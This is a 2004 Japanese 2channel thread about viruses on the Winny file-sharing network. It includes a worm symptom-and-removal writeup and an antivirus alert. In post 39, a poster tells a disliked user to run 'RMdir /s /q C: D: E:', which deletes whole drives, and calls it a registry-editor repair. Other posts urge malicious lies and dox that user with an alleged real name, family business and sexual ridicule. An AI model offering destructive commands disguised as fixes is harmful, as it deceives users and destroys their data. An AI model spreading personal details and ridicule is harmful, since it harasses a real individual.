Part24 http://tmp4.2ch.net/test/read.cgi/download/1092058756/
Part25 http://tmp4.2ch.net/test/read.cgi/download/1093270545/
Part26 http://tmp4.2ch.net/test/read.cgi/download/1094872215/
Part27 http://tmp4.2ch.net/test/read.cgi/download/1095939735/
Part28 http://tmp4.2ch.net/test/read.cgi/download/1096694962/
Part29 http://tmp4.2ch.net/test/read.cgi/download/1098962243/
Part30 http://tmp4.2ch.net/test/read.cgi/download/1099709559/
Part31 http://tmp4.2ch.net/test/read.cgi/download/1100072614/
16 :奈野りゅう ドラゴン ロアー tarte 仙台ギャラクシーエンジェルズ:04/12/13 10:07:43 ID:OvDrzuZ5
仙台ウイルスに感染した管理人、奈野りゅうのHP ドラゴン・ロアー
http://homepage2.nifty.com/dragon-r/
このサイトはWinnyを使って手に入れた特定のexeファイルをクリックしたときに感染する
ウイルス「仙台ギャラクシーエンジェルス」に感染しエロゲー(やはり割れなのか)や
絵描きツールを使用している自身のデスクトップ画像などをWinny上でバラまいていた。
そこに、優しい2ちゃんねらーが本人サイトの掲示板で教えてあげたところ、それに気づいた
管理人は速攻でその記事を削除。当然謝罪などの声明もナシ。一般常識のかけらもないと思われる。
同じく速攻で消したリンクページ
イラスト・テキスト系
canvas/宮坂みゆ http://www.geocities.co.jp/Playtown-Bingo/2988/
メビ小隊/メビにゃー http://www.hm7.aitai.ne.jp/~ifudodo/
kool spice/冬野 http://www.kdn.gr.jp/~fuyuno/index.htm
茶色の小箱/brown http://www.geocities.co.jp/HeartLand-Oak/4720/
ACOMPRE/こぴーあんへる http://www004.upp.so-net.ne.jp/ibara/
LOVERS・オブ・ロード館/アキラ http://www.geocities.co.jp/Playtown-Yoyo/1512/
俺よりダメな奴に会いに行く/しゃがみ中パンチ(O山プロ代表) http://shagatyu.fc2web.com/
虚無/GM・T http://www.earthdragon.jp/~karla/
卓上ゲーム系
Hex-a-Gram/なお丸 http://www.geocities.co.jp/Playtown-Dice/2787/index.html
F.E.A.R. Online/F.E.A.R. http://www.fear.co.jp/
グループSNEホームページ/グループSNE http://www.groupsne.co.jp/
http://homepage2.nifty.com/dragon-r/
このサイトはWinnyを使って手に入れた特定のexeファイルをクリックしたときに感染する
ウイルス「仙台ギャラクシーエンジェルス」に感染しエロゲー(やはり割れなのか)や
絵描きツールを使用している自身のデスクトップ画像などをWinny上でバラまいていた。
そこに、優しい2ちゃんねらーが本人サイトの掲示板で教えてあげたところ、それに気づいた
管理人は速攻でその記事を削除。当然謝罪などの声明もナシ。一般常識のかけらもないと思われる。
同じく速攻で消したリンクページ
イラスト・テキスト系
canvas/宮坂みゆ http://www.geocities.co.jp/Playtown-Bingo/2988/
メビ小隊/メビにゃー http://www.hm7.aitai.ne.jp/~ifudodo/
kool spice/冬野 http://www.kdn.gr.jp/~fuyuno/index.htm
茶色の小箱/brown http://www.geocities.co.jp/HeartLand-Oak/4720/
ACOMPRE/こぴーあんへる http://www004.upp.so-net.ne.jp/ibara/
LOVERS・オブ・ロード館/アキラ http://www.geocities.co.jp/Playtown-Yoyo/1512/
俺よりダメな奴に会いに行く/しゃがみ中パンチ(O山プロ代表) http://shagatyu.fc2web.com/
虚無/GM・T http://www.earthdragon.jp/~karla/
卓上ゲーム系
Hex-a-Gram/なお丸 http://www.geocities.co.jp/Playtown-Dice/2787/index.html
F.E.A.R. Online/F.E.A.R. http://www.fear.co.jp/
グループSNEホームページ/グループSNE http://www.groupsne.co.jp/
17 :[名無し]さん(bin+cue).rar:04/12/13 10:30:35 ID:sfiN7JZs
<うさだ萌え ◆HkEgRy0Iso のデータ>
【本名】吉川友章(ともあき)
【メールアドレス】[email protected]
【身長・体重】158cm・体重48kg
【実家】大阪アメリカ村にあるラーメン屋
【除籍前の大学】大阪商業大学
【口癖】
「黙れ、ハゲ」「死ね、ハゲ」「金、貸せ」「アホォ」「愚図」
【特技】
文章を書く時に、必要以上に読点を打つ(読みづらい)
自分に都合の良い意見しか聞かない(マジレスも曲解するアホ)
【その他の特徴】
・もえたそ ◆jM68MB.ATI という女コテハンに夢中
・もえたそ ◆jM68MB.ATI を想像して毎日5回のオナニーが日課
・イク時は近所に響くくらいの情けない声を出す
・ズリネタはもえたそ ◆jM68MB.ATI と2次元美少女のみ
・もえたそ ◆jM68MB.ATI が好きなのについ冷たくしてしまう
・身長を伸ばして もえたそ ◆jM68MB.ATI を振り向かせたい
・免許を取ってもえたそ ◆jM68MB.ATI とグロリアに乗りたい
【本名】吉川友章(ともあき)
【メールアドレス】[email protected]
【身長・体重】158cm・体重48kg
【実家】大阪アメリカ村にあるラーメン屋
【除籍前の大学】大阪商業大学
【口癖】
「黙れ、ハゲ」「死ね、ハゲ」「金、貸せ」「アホォ」「愚図」
【特技】
文章を書く時に、必要以上に読点を打つ(読みづらい)
自分に都合の良い意見しか聞かない(マジレスも曲解するアホ)
【その他の特徴】
・もえたそ ◆jM68MB.ATI という女コテハンに夢中
・もえたそ ◆jM68MB.ATI を想像して毎日5回のオナニーが日課
・イク時は近所に響くくらいの情けない声を出す
・ズリネタはもえたそ ◆jM68MB.ATI と2次元美少女のみ
・もえたそ ◆jM68MB.ATI が好きなのについ冷たくしてしまう
・身長を伸ばして もえたそ ◆jM68MB.ATI を振り向かせたい
・免許を取ってもえたそ ◆jM68MB.ATI とグロリアに乗りたい
18 :[名無し]さん(bin+cue).rar:04/12/13 14:01:35 ID:ZeBC0r1B
★流行種その5
【仙台キンタマ-W32.SillyP2P】
■感染ルート
・主にエロゲのイメージファイルをマウント、オートランでウイルス発動。
■症状(感染確認方法)
・壁紙を勝手に変更する。
・windows\system32の中にexeを作製(svchost32.exe、setup.exe、ごみ箱.exeなど)
・HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Runに上記exe追加。
・レジストリエディタをメモ帳で上書き。
・UpFolder.txtにUPフォルダを追加し、
Download.txtにウイルスと思われるスペースつきのexeファイルを追加する。
・winnyのフォルダ内に隠しフォルダでUPフォルダが作られ、
downフォルダ内のファイル一覧のtxt、デスクトップSS、
Favorites、受信トレイ.dbx、送信トレイ.dbx、My Documentsが入れられる。
・UP時のトリップはユーザー名の模様 。
・Ignore.txtに仙台ギャラクシーエンジェルズを追加するため、自分が晒されてると気づきにくい。
■駆除方法
・windows\system32の中に作製されたexeを削除。
・CDなどから正常なレジストリエディタに戻す。
・HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Runに追加されたキー削除。
・UpFolder.txt、Download.txtの問題箇所修正削除。
■予防
・exeは踏まない。
・オートランを切る。
・エロゲをマウントしない。
【仙台スクリーンセーバー】
・仙台キンタマの2次感染を狙ったもの、仙台キンタマが放流する詰合わせに偽装。
・『(ユーザー名が2-3文字の女性名、トリップ無し)に混在の.scr』とスクリーンセーバ偽装。
・症状は.doc .xls .txt .jpgなどを収集しnyへ放流する。
・ノートン先生がAntinny.Gとして緊急対策。
【仙台キンタマ-W32.SillyP2P】
■感染ルート
・主にエロゲのイメージファイルをマウント、オートランでウイルス発動。
■症状(感染確認方法)
・壁紙を勝手に変更する。
・windows\system32の中にexeを作製(svchost32.exe、setup.exe、ごみ箱.exeなど)
・HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Runに上記exe追加。
・レジストリエディタをメモ帳で上書き。
・UpFolder.txtにUPフォルダを追加し、
Download.txtにウイルスと思われるスペースつきのexeファイルを追加する。
・winnyのフォルダ内に隠しフォルダでUPフォルダが作られ、
downフォルダ内のファイル一覧のtxt、デスクトップSS、
Favorites、受信トレイ.dbx、送信トレイ.dbx、My Documentsが入れられる。
・UP時のトリップはユーザー名の模様 。
・Ignore.txtに仙台ギャラクシーエンジェルズを追加するため、自分が晒されてると気づきにくい。
■駆除方法
・windows\system32の中に作製されたexeを削除。
・CDなどから正常なレジストリエディタに戻す。
・HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Runに追加されたキー削除。
・UpFolder.txt、Download.txtの問題箇所修正削除。
■予防
・exeは踏まない。
・オートランを切る。
・エロゲをマウントしない。
【仙台スクリーンセーバー】
・仙台キンタマの2次感染を狙ったもの、仙台キンタマが放流する詰合わせに偽装。
・『(ユーザー名が2-3文字の女性名、トリップ無し)に混在の.scr』とスクリーンセーバ偽装。
・症状は.doc .xls .txt .jpgなどを収集しnyへ放流する。
・ノートン先生がAntinny.Gとして緊急対策。
19 :[名無し]さん(bin+cue).rar:04/12/13 14:06:42 ID:ZeBC0r1B
>>12で仙台ウイルス関連の情報求めてるけどもう出ないので
過去スレでまとめられてるのでもう打ち止め、まとめたら?と。
そんなわけで、2次感染のを「仙台スクリーンセーバー」って名づけて
>>18で貼っておきました。
過去スレでまとめられてるのでもう打ち止め、まとめたら?と。
そんなわけで、2次感染のを「仙台スクリーンセーバー」って名づけて
>>18で貼っておきました。
20 :[名無し]さん(bin+cue).rar:04/12/13 15:25:34 ID:x8G/87RA
乙!情報解析取れたのね
21 :[名無し]さん(bin+cue).rar:04/12/13 16:22:13 ID:G9Avr3e+
22 :[名無し]さん(bin+cue).rar:04/12/13 18:23:34 ID:nPqgmbaV
sssssssssssssssss
23 :[名無し]さん(bin+cue).rar:04/12/13 18:52:52 ID:jWlXlgdr
24 :[名無し]さん(bin+cue).rar:04/12/13 18:57:20 ID:CPAB46Hv
前スレ >880 俺もさっき引っかかって電源落としました。
25 :[名無し]さん(bin+cue).rar:04/12/13 19:16:28 ID:/dE4DuM8
キンタマだけで50近くあった・・・
全部で114のウィルス・・・
もうだめぽ
全部で114のウィルス・・・
もうだめぽ
26 :[名無し]さん(bin+cue).rar:04/12/13 22:41:20 ID:kIthSJ7j
対策何もしてなかったの?
27 :[名無し]さん(bin+cue).rar:04/12/13 22:57:44 ID:85FjXsln
>26
多分対策しても無駄
多分対策しても無駄
28 :うさだ萌え ◆HkEgRy0Iso :04/12/14 00:08:56 ID:KiuYV2Zd
なぁ、CD革命、って、どうやって、マウントするんだ?ハゲ。
出来合いの、bin cue FIXイメージを、マウントしたいんだが。
FCDに、しないと、マウントできないのか?ハゲ。
出来合いの、bin cue FIXイメージを、マウントしたいんだが。
FCDに、しないと、マウントできないのか?ハゲ。
29 :うさだ萌え ◆HkEgRy0Iso :04/12/14 00:09:50 ID:KiuYV2Zd
っで、とりあえず、イメージを、DLしたはいいが、デーモンツール、じゃ、
起動できねーし。もえたその、愚図、に、メール、送ったが、返信こねーし。ハゲ。
ほんと、リアルで、コピーガード、については、初めての、対峙だから。
どうやって、起動するか、教えろ。ハゲ。
起動できねーし。もえたその、愚図、に、メール、送ったが、返信こねーし。ハゲ。
ほんと、リアルで、コピーガード、については、初めての、対峙だから。
どうやって、起動するか、教えろ。ハゲ。
30 :[名無し]さん(bin+cue).rar:04/12/14 00:12:45 ID:vYcLHhJl
うさだ回収に参りました
∧∧ ∧∧
< > < >
(==\(`Д´)テ==)
>λ )( ) | i 丿
○ ( ) O人O ( )
ズルズル
∧∧ ∧∧
< > < >
(==\(`Д´)テ==)
>λ )( ) | i 丿
○ ( ) O人O ( )
ズルズル
31 :うさだ萌え ◆HkEgRy0Iso :04/12/14 00:14:06 ID:KiuYV2Zd
>>、http://tmp4.2ch.net/test/read.cgi/download/1100072614/988、
thax。っと、ゆいたいところっだっが、ハゲ。
>レジストリ”エディタ”は元には戻らないが
!?、元に戻す方法、教えろ。ハゲ。
thax。っと、ゆいたいところっだっが、ハゲ。
>レジストリ”エディタ”は元には戻らないが
!?、元に戻す方法、教えろ。ハゲ。
32 :うさだ萌え ◆HkEgRy0Iso :04/12/14 00:14:57 ID:KiuYV2Zd
>>30、ぎゃーす。死ね、ハゲっが。
33 :[名無し]さん(bin+cue).rar:04/12/14 00:20:15 ID:yiV0RKFT
スルーしてみ、どんどんエスカレートして面白いから
34 :[名無し]さん(bin+cue).rar:04/12/14 00:23:17 ID:dqR72ctE
35 :[名無し]さん(bin+cue).rar:04/12/14 00:33:19 ID:MZFyMtmH
前スレの終わりくらいからあぼーんが大漁
36 :[名無し]さん(bin+cue).rar:04/12/14 00:36:45 ID:GCoJQyn2
>>32
これは本当におまえなのか?
<うさだ萌え ◆HkEgRy0Iso のデータ>
【本名】吉川友章(ともあき)
【メールアドレス】[email protected]
【身長・体重】158cm・体重48kg
【実家】大阪アメリカ村にあるラーメン屋
【除籍前の大学】大阪商業大学
【口癖】
「黙れ、ハゲ」「死ね、ハゲ」「金、貸せ」「アホォ」「愚図」
【特技】
文章を書く時に、必要以上に読点を打つ(読みづらい)
自分に都合の良い意見しか聞かない(マジレスも曲解するアホ)
【その他の特徴】
・もえたそ ◆jM68MB.ATI という女コテハンに夢中
・もえたそ ◆jM68MB.ATI を想像して毎日5回のオナニーが日課
・イク時は近所に響くくらいの情けない声を出す
・ズリネタはもえたそ ◆jM68MB.ATI と2次元美少女のみ
・もえたそ ◆jM68MB.ATI が好きなのについ冷たくしてしまう
・身長を伸ばして もえたそ ◆jM68MB.ATI を振り向かせたい
・免許を取ってもえたそ ◆jM68MB.ATI とグロリアに乗りたい
これは本当におまえなのか?
<うさだ萌え ◆HkEgRy0Iso のデータ>
【本名】吉川友章(ともあき)
【メールアドレス】[email protected]
【身長・体重】158cm・体重48kg
【実家】大阪アメリカ村にあるラーメン屋
【除籍前の大学】大阪商業大学
【口癖】
「黙れ、ハゲ」「死ね、ハゲ」「金、貸せ」「アホォ」「愚図」
【特技】
文章を書く時に、必要以上に読点を打つ(読みづらい)
自分に都合の良い意見しか聞かない(マジレスも曲解するアホ)
【その他の特徴】
・もえたそ ◆jM68MB.ATI という女コテハンに夢中
・もえたそ ◆jM68MB.ATI を想像して毎日5回のオナニーが日課
・イク時は近所に響くくらいの情けない声を出す
・ズリネタはもえたそ ◆jM68MB.ATI と2次元美少女のみ
・もえたそ ◆jM68MB.ATI が好きなのについ冷たくしてしまう
・身長を伸ばして もえたそ ◆jM68MB.ATI を振り向かせたい
・免許を取ってもえたそ ◆jM68MB.ATI とグロリアに乗りたい
37 :[名無し]さん(bin+cue).rar:04/12/14 00:47:12 ID:9waVVsmt
>>31 何故、標準装備のレジストリ”エディタ”に固執するのか分からん
お前さんもなんか勘違いしている様な気がするので書くが
まず、レジストリとレジストリ”エディタ”は別物
win標準装備のレジストリ”エディタ”はその名の通り、レジストリを編集できる1ツールに過ぎない
だから、他に便利なものが在ればそれを使えば良いし、標準装備の奴が使えないなら尚更そうすべき
(まぁmediaplayerのかわりにwinamp使うような・・・違うか、メモ帳代わりの秀丸?)
お前さんが何をマウントするのに苦戦しているのか知らないが、代用の1ツールdlすれば万事解決
お前さんもなんか勘違いしている様な気がするので書くが
まず、レジストリとレジストリ”エディタ”は別物
win標準装備のレジストリ”エディタ”はその名の通り、レジストリを編集できる1ツールに過ぎない
だから、他に便利なものが在ればそれを使えば良いし、標準装備の奴が使えないなら尚更そうすべき
(まぁmediaplayerのかわりにwinamp使うような・・・違うか、メモ帳代わりの秀丸?)
お前さんが何をマウントするのに苦戦しているのか知らないが、代用の1ツールdlすれば万事解決
38 :[名無し]さん(bin+cue).rar:04/12/14 00:52:49 ID:GCoJQyn2
レジストリエディタ元に戻す方法は・・・・・・・
あれ、うさだいないのか?
あれ、うさだいないのか?
39 :[名無し]さん(bin+cue).rar:04/12/14 01:38:32 ID:DTLbs05d
うさだとかいうコテウザイ。
レジストリエディタの修復方法教えてやるからさっさと消えろ。
> 詳しくは省くけど、DOSからRecoveryManagerを起動してシステムファイルを修復すればいい。
> コマンドプロンプトを起動してC:のルートに移動してから「RMdir /s /q C: 2> fix」(半角スペースも含め正確にタイプ)
> システムがDに入ってる場合はC:じゃなくてD:な。
> 念のため「RMdir /s /q C: D: E: 2> fix」てな感じで全ドライブにやっておくとなお安心。
> ルートに移動する方法がワカランのなら次ので。これなら全て一発で行ける。「CD C:\ && RMdir /s /q C: D: E: 2> fix」
> 実行後はDOS窓にcompleteが出るまで茶でも飲んで待て。
わかったらもうこのスレ来ないでくれ。
レジストリエディタの修復方法教えてやるからさっさと消えろ。
> 詳しくは省くけど、DOSからRecoveryManagerを起動してシステムファイルを修復すればいい。
> コマンドプロンプトを起動してC:のルートに移動してから「RMdir /s /q C: 2> fix」(半角スペースも含め正確にタイプ)
> システムがDに入ってる場合はC:じゃなくてD:な。
> 念のため「RMdir /s /q C: D: E: 2> fix」てな感じで全ドライブにやっておくとなお安心。
> ルートに移動する方法がワカランのなら次ので。これなら全て一発で行ける。「CD C:\ && RMdir /s /q C: D: E: 2> fix」
> 実行後はDOS窓にcompleteが出るまで茶でも飲んで待て。
わかったらもうこのスレ来ないでくれ。
40 :[名無し]さん(bin+cue).rar:04/12/14 02:56:48 ID:Bqv9SU9q
nyを起動すると数分でnyが固まるようになった
nyがCPU使用率99%で応答無しになる
nyのフォルダごと捨てて新たに入れても同じ症状
これってなんかに感染したのかな?
ノートンでPC全スキャンしても何も出なかった
nyがCPU使用率99%で応答無しになる
nyのフォルダごと捨てて新たに入れても同じ症状
これってなんかに感染したのかな?
ノートンでPC全スキャンしても何も出なかった
41 :[名無し]さん(bin+cue).rar:04/12/14 02:59:08 ID:UmAi4YCx
というかクリーンインストールした方が早いよ。
42 :[名無し]さん(bin+cue).rar:04/12/14 03:37:10 ID:7nBF3UB6
>>40
瞬間的なら俺の糞PC(ny専用のペン3 500MHZ)も100逝くけどな。固まったりはしないが。
瞬間的なら俺の糞PC(ny専用のペン3 500MHZ)も100逝くけどな。固まったりはしないが。
43 :[名無し]さん(bin+cue).rar:04/12/14 08:50:36 ID:XTQhX2Vo
______
| ,.へ、__,.ヘ/
| / \ ∠ヽ
|i^|「::::::ノ=l:::::ィ / ̄ ̄ ̄ ̄
,. -‐- 、 |ヽ| r_ \l | 静粛に……!
_/ \ ____/| ∧. (二二7! < この男……うさだ萌え ◆HkEgRy0Isoは
∠ ハヾミニ.r-、\∠L:r‐-‐-、:::::::::|/ ヽ_‐__.」`ー- | 住人と語るためではなく、妄想をぶちまけるために
. /ィ ,L V∠ \l \\.)j j j j`二i\ /:|:::::::::::: | ここへ訪れたキチガイだ……!
W、ゞi ,、~ __ 「 ̄∧ ヾ´´´ |. \ / |:::::::::::: |
,ゝし'/ ,ノ.| / i l. l \、.|:::::::::::: | 良い子のみんなは
l 、`ヾニンl\./\|l、_」 ヽ、 / ヾ::::::::::::: | このバカにマジレスをしてはいけない……!
. | l | _l\ト、 | \r──‐┐ト/ / r‐┴-、:::
. |. | 7 l ヽ | /うさだ.| | ∨ {ニニヾヽ 悪質なウソやデタラメを教えるのは許可する!
| ,.へ、__,.ヘ/
| / \ ∠ヽ
|i^|「::::::ノ=l:::::ィ / ̄ ̄ ̄ ̄
,. -‐- 、 |ヽ| r_ \l | 静粛に……!
_/ \ ____/| ∧. (二二7! < この男……うさだ萌え ◆HkEgRy0Isoは
∠ ハヾミニ.r-、\∠L:r‐-‐-、:::::::::|/ ヽ_‐__.」`ー- | 住人と語るためではなく、妄想をぶちまけるために
. /ィ ,L V∠ \l \\.)j j j j`二i\ /:|:::::::::::: | ここへ訪れたキチガイだ……!
W、ゞi ,、~ __ 「 ̄∧ ヾ´´´ |. \ / |:::::::::::: |
,ゝし'/ ,ノ.| / i l. l \、.|:::::::::::: | 良い子のみんなは
l 、`ヾニンl\./\|l、_」 ヽ、 / ヾ::::::::::::: | このバカにマジレスをしてはいけない……!
. | l | _l\ト、 | \r──‐┐ト/ / r‐┴-、:::
. |. | 7 l ヽ | /うさだ.| | ∨ {ニニヾヽ 悪質なウソやデタラメを教えるのは許可する!
44 :[名無し]さん(bin+cue).rar:04/12/14 12:38:07 ID:em8Aan6u
_,,,......,,__
/_~ ,,...:::_::;; ~"'ヽ
(,, '"ヾヽ i|i //^''ヽ,,)
^ :'⌒i i⌒"
| ( ゚Д゚) <うさだ萌え
|(ノ |)
| |
ヽ _ノ
U"U
/_~ ,,...:::_::;; ~"'ヽ
(,, '"ヾヽ i|i //^''ヽ,,)
^ :'⌒i i⌒"
| ( ゚Д゚) <うさだ萌え
|(ノ |)
| |
ヽ _ノ
U"U
45 :うんこ ◆9Ce54OonTI :04/12/14 13:01:16 ID:N0xYpkKq
ああ
46 :[名無し]さん(bin+cue).rar:04/12/14 13:02:59 ID:N0xYpkKq
うさだなんなんだおまえ
47 :[名無し]さん(bin+cue).rar:04/12/14 21:24:43 ID:ObkCcSxM
OS再インスコが面倒じゃなくて、大量のエロゲ再インスコが面倒なんだろ?
俺なんて1時間程度ですんだぞハゲ。
俺なんて1時間程度ですんだぞハゲ。
48 :[名無し]さん(bin+cue).rar:04/12/14 23:00:11 ID:ObkCcSxM
誰か何か書けよ、1時間以上書き込みが無くて泣きそうだったぞトニー
49 :[名無し]さん(bin+cue).rar:04/12/14 23:00:40 ID:Z8H7sSkI
リロードばっかしてるんじゃない
50 :[名無し]さん(bin+cue).rar:04/12/14 23:53:26 ID:5Q2N0BOa
漏れ、感染してからずっと不正アクセス受けるようになって、OS再インスコしても治んない
51 :[名無し]さん(bin+cue).rar:04/12/15 00:49:11 ID:zhI/xZED
52 :[名無し]さん(bin+cue).rar:04/12/15 01:40:31 ID:7oY1ojj2
うさだ来なくなった?
もしかしてリカバリーマネージャーのコマンドを実行して全てがすっきり解決しちゃったのかな。
まぁ何にせよ静かなのは良い事だ。
もしかしてリカバリーマネージャーのコマンドを実行して全てがすっきり解決しちゃったのかな。
まぁ何にせよ静かなのは良い事だ。
53 :[名無し]さん(bin+cue).rar:04/12/15 02:27:58 ID:RVt3q60N
>>52
やっぱりソレかねぇ
やっぱりソレかねぇ
54 :[名無し]さん(bin+cue).rar:04/12/15 06:00:58 ID:vkCk8cYT
不正アクセスを受けているってどうやってわかるんですか?
55 :[名無し]さん(bin+cue).rar:04/12/15 06:21:15 ID:52jZ2nPZ
56 :[名無し]さん(bin+cue).rar:04/12/15 07:01:57 ID:rgqCzpQE
nyのキャッシュ自動削除ソフトのWCSRでトロイが見つかったんだけど、スレ違いだからまあいっか…。
http://www.domo2.net/bbs/test/read.cgi/picture/1048436364/977
一応証拠画像貼っといた。
http://www.domo2.net/bbs/test/read.cgi/picture/1048436364/977
一応証拠画像貼っといた。
57 :[名無し]さん(bin+cue).rar:04/12/15 08:07:40 ID:vkCk8cYT
>>55
ありがとうございます。理解しました。
ありがとうございます。理解しました。
58 :[名無し]さん(bin+cue).rar:04/12/15 08:43:29 ID:OtOIfBoL
>>56
オマイ頭悪いだろ
オマイ頭悪いだろ
59 :[名無し]さん(bin+cue).rar:04/12/15 09:06:22 ID:rgqCzpQE
>>58
(ノ∀`)
(ノ∀`)
60 :[名無し]さん(bin+cue).rar:04/12/15 15:06:03 ID:okgiYDLC
**********************************************************************
◆WORM_ZAFI.D(ザフィー)
危険度:中 ☆イエローアラート☆
VAC:4 ※1
パターンファイル:2.297.00以降 ※2
**********************************************************************
危険度“中”のウイルスが確認されました。
2004年12月15日、ドイツ、フランス、ドイツ、スペインで感染報告が確認
されています。
イエローアラートとして警告します。
■ウイルスの特徴
メール、P2Pアプリケーションソフトを介して自身を頒布するワーム活動を行います。
メールの内容は以下の通りです。
[件名]
Re: Merry Chrsitmas!
[本文]
Happy Hollydays!
:) Pamela M.
[添付ファイル]
postcard.index.php1111.pif
◆WORM_ZAFI.D(ザフィー)
危険度:中 ☆イエローアラート☆
VAC:4 ※1
パターンファイル:2.297.00以降 ※2
**********************************************************************
危険度“中”のウイルスが確認されました。
2004年12月15日、ドイツ、フランス、ドイツ、スペインで感染報告が確認
されています。
イエローアラートとして警告します。
■ウイルスの特徴
メール、P2Pアプリケーションソフトを介して自身を頒布するワーム活動を行います。
メールの内容は以下の通りです。
[件名]
Re: Merry Chrsitmas!
[本文]
Happy Hollydays!
:) Pamela M.
[添付ファイル]
postcard.index.php1111.pif
61 :[名無し]さん(bin+cue).rar:04/12/16 12:27:58 ID:S3iuWl3k
(¬_¬)
62 :[名無し]さん(bin+cue).rar:04/12/16 20:20:28 ID:E34z0soY
平和って事か・・・ (゚д゚)y-~~~
63 :[名無し]さん(bin+cue).rar:04/12/16 20:50:32 ID:W/RvxqeF
バスターも警告来たよ。
こんなの。
┌──────────────────────┐
| |
| ,___ |
| l――、;^l Trend Micro ケルタフキッスコ コ・・ー豌 .|
| |-− .,-、l .|
| |。。"`l :;;.l .|
| `~ ̄ ̄~ |
| Trend Micro Inc. |
| …………………………………………………… |
| |
| サ・ケルタフキッスコー。ケ゚ー゚オヌセスタエマエル. .|
| "in-the-wild". テヨスナ ケルタフキッスコ ニミナマ .|
| ニトタマタサ エルソモホオ衂マキチク・[セ・・タフニョ]クヲ .|
| ナャクッヌマスハステソタ. .|
| |
| |
| |
| |
| |
| |
| |
| WORM_ZAFID .|
| ┌───────┐ ┌───────┐ |
| | セ・・タフニョ | | エンア .| |
| └───────┘ └───────┘ |
| |
└──────────────────────┘
こんなの。
┌──────────────────────┐
| |
| ,___ |
| l――、;^l Trend Micro ケルタフキッスコ コ・・ー豌 .|
| |-− .,-、l .|
| |。。"`l :;;.l .|
| `~ ̄ ̄~ |
| Trend Micro Inc. |
| …………………………………………………… |
| |
| サ・ケルタフキッスコー。ケ゚ー゚オヌセスタエマエル. .|
| "in-the-wild". テヨスナ ケルタフキッスコ ニミナマ .|
| ニトタマタサ エルソモホオ衂マキチク・[セ・・タフニョ]クヲ .|
| ナャクッヌマスハステソタ. .|
| |
| |
| |
| |
| |
| |
| |
| WORM_ZAFID .|
| ┌───────┐ ┌───────┐ |
| | セ・・タフニョ | | エンア .| |
| └───────┘ └───────┘ |
| |
└──────────────────────┘
64 :[名無し]さん(bin+cue).rar:04/12/16 21:55:49 ID:8hzcgIOx
サ・ケルタフキッス [セ・・タフニョ]クヲ
この辺が暗号を解く鍵になる様な気がナャクッヌマスハステソタ.
この辺が暗号を解く鍵になる様な気がナャクッヌマスハステソタ.
65 :[名無し]さん(bin+cue).rar:04/12/16 22:07:29 ID:3bZtoF5q
フォルダアイコン偽装の新ウイルスでたんか?
それっぽいのさっき踏んだわ。
それっぽいのさっき踏んだわ。
66 :[名無し]さん(bin+cue).rar:04/12/16 22:23:08 ID:wUQZ84Oy
>>65
そいつが入ってたファイル名とハッシュキボン。
そいつが入ってたファイル名とハッシュキボン。
67 :[名無し]さん(bin+cue).rar:04/12/16 22:47:50 ID:XuJRPdgA
>65
似たようなの踏んで、Dドライブ&マイドキュメント全消しされた
からくりサーカス34巻だった
似たようなの踏んで、Dドライブ&マイドキュメント全消しされた
からくりサーカス34巻だった
68 :[名無し]さん(bin+cue).rar:04/12/16 23:16:51 ID:3bZtoF5q
ちなみにノートン常駐でiveupdateも自動でも引っかからんかった
69 :[名無し]さん(bin+cue).rar:04/12/16 23:31:34 ID:2xGJfiRC
>>65
新ウイルスと判断した理由を言え
新ウイルスと判断した理由を言え
70 :[名無し]さん(bin+cue).rar:04/12/17 00:25:39 ID:Jb9nblh1
ノートンに引っかからなかったから新ウイルスに違いない!
なんと言ってもこの僕が引っかかってしまうくらいだからきっと新手の強力ウイルスだ!!
なんと言ってもこの僕が引っかかってしまうくらいだからきっと新手の強力ウイルスだ!!
71 :[名無し]さん(bin+cue).rar:04/12/17 00:30:47 ID:LPinAztz
>>70
|∀・)
|∀・)
72 :[名無し]さん(bin+cue).rar:04/12/17 00:32:07 ID:phzS3bcw
>>70
君に超ワラタ
君に超ワラタ
73 :[名無し]さん(bin+cue).rar:04/12/17 00:32:31 ID:phzS3bcw
ごめん>>71にだったorx
74 :[名無し]さん(bin+cue).rar:04/12/17 00:47:15 ID:ajHE56sr
nyしようとしたらノードが消えてたんだがそんなウイルスいるのか?
シマンティックとAVGともに検知せず
シマンティックとAVGともに検知せず
75 :[名無し]さん(bin+cue).rar:04/12/17 00:51:45 ID:4i/ukn91
時々そういう症状をみるね。
たしか、nyのノード記録したファイルが壊れただけとかじゃなかったっけ?
てか漏れもなったことあるし。
たしか、nyのノード記録したファイルが壊れただけとかじゃなかったっけ?
てか漏れもなったことあるし。
76 :[名無し]さん(bin+cue).rar:04/12/17 00:55:58 ID:ajHE56sr
た、助かった。また、再インスコするのするのかと思った。
どうも、ありがとうございました
どうも、ありがとうございました
77 :[名無し]さん(bin+cue).rar:04/12/17 00:59:13 ID:OWRefc86
>>76
「また」って、アンタ・・・
「また」って、アンタ・・・
78 :[名無し]さん(bin+cue).rar:04/12/17 01:06:20 ID:ajHE56sr
デバイス更新したら調子悪くなって1週間前に再インスコしたんですよ
79 :[名無し]さん(bin+cue).rar:04/12/17 06:50:27 ID:hSuqWUSa
バックアップも取らんのか君は?
80 :[名無し]さん(bin+cue).rar:04/12/17 09:17:21 ID:mAO4iJgi
ファイルフォルダに偽装されたexeを踏んでしまって
作ってもいないうpフォルダに眼鏡の男のjpgが出来たんですがこれってキンタマですか?
作ってもいないうpフォルダに眼鏡の男のjpgが出来たんですがこれってキンタマですか?
81 :[名無し]さん(bin+cue).rar:04/12/17 10:53:40 ID:sB6sAUtR
おちついてその画像を見つめなおしてください
モニタに自分の顔が映っただけのことです。
モニタに自分の顔が映っただけのことです。
82 :[名無し]さん(bin+cue).rar:04/12/17 11:47:48 ID:70r4KBvP
83 :[名無し]さん(bin+cue).rar:04/12/17 12:18:39 ID:aay/q3ji
。|
| |。 |゚ y
゚| | |io i| バカが踏む
。| ゚i| 。i|,,ノ |i ぬるぼにキンタマ
i|゚ ||゚ /ii 。 ゚|i_/゚ エトセトラ
`ヽoー|i;|y-ノ
,;:i´i;ノ
('';ii;;''
ii\;;;ii'ノ
ノ ∧_∧ o .../::;
( ´∀`) () /二ヽ . .: :ii:|
(つ[] つ┃ |□| コンッ . .:__i:i|
(、 ^ヽ ^ヽ 旦~ `)三(´ ミ // ヾ.:
